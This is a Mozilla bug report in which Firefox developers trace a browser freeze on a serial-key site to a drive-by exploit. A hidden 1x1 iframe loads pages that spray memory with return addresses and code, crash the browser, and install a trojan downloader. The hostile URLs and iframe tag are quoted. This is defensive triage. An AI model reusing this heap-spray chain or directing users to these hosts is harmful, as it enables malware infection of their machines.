Closed
Bug 320348
Opened 19 years ago
Closed 19 years ago
browser freezes because of an illegal script
Categories
(Core :: Security, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 317334
People
(Reporter: fignamoya, Assigned: dveditz)
References
()
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Browser freezes due to an illegal script on a page. This, in turn causes all firefox windows to close.
Reproducible: Always
Steps to Reproduce:
1. go to http://www.serials.ws/all/?l=v&pn=3
2. ctrl+f and search 1301 on the page (javascript link to visual assist x... 1301)
3. click on the link and observe how the browser runs cpu usage to 100%
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Comment 1•19 years ago
|
||
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500
I see this too.
in addition this appears to disable block popups option in the browser
Component: Layout → JavaScript Engine
Comment 3•19 years ago
|
||
view-source:http://www.serials.ws/all/?l=v&pn=3
<a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30
http://www.serials.ws/serws.js
function d(id){
window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550');
}
view-source:http://www.serials.ws/d.php?170307
this page contains an iframe:
<iframe src="http://toolbarurl.biz/dl/adv661.php" width=1 height=1></iframe>
the iframe loads:
view-source:http://toolbarurl.biz/dl/adv661.php
this in turn loads 8 iframes:
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
and 1 iframe:
view-source:http://toolbarurl.biz/dl/bag.htm
Comment 4•19 years ago
|
||
seen with the view-source: prefixed, the URLs in comment 3 are harmless.
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
fills the memory with with 100000 times an returnadress, and then a short piece of code, 586 words.
memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code.
google search for ADV661 shows it is a trojan:
http://sandbox.norman.no/live_2.html?logfile=437547
http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html
If you've been on the site, read the reports to check if you are infected.
I don't want to try going to this site with js enabled.
I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit
Comment 5•19 years ago
|
||
Similar scripts used in
Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript
Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug]
*** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•